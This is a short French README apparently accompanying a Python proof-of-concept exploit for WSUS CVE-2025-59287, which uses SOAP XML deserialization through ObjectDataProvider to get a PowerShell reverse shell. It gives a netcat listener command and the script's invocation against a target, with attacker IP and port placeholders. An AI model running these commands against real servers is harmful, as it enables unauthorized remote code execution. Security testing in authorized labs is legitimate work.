
Exploit PoC pour WSUS CVE-2025-59287 utilisant la désérialisation XML pour obtenir un reverse shell Windows via SOAP et ObjectDataProvider.
WSUS CVE-2025-59287 – Désérialisation XML RCE (Reverse Shell) Un PoC ciblé pour exploiter WSUS CVE-2025-59287 via la désérialisation XML afin d'obtenir un reverse shell Windows. Ce script ne prend en charge qu'une charge utile de type reverse shell (pas de repli calc). Cible : Windows Server avec le rôle WSUS Technique : désérialisation SOAP + ObjectDataProvider Résultat : cmd.exe lance un reverse shell PowerShell vers votre listener Avertissement Réservé aux tests autorisés en environnement de laboratoire uniquement. Vous êtes responsable du respect de toutes les lois applicables. Prérequis Python 3.x Accès réseau aux points de terminaison WSUS (généralement 8530/8531) Listener sur votre machine (par ex., nc)
nc -lvnp 4444
python3 my-CVE-2025-59287.py -u http://TARGET:8531 -l YOUR_IP -p 4444 --debug
-u : URL de base WSUS (http/https, généralement le port 8530/8531) -l : Votre IP pour recevoir le shell -p : Port de votre listener --debug : Sortie détaillée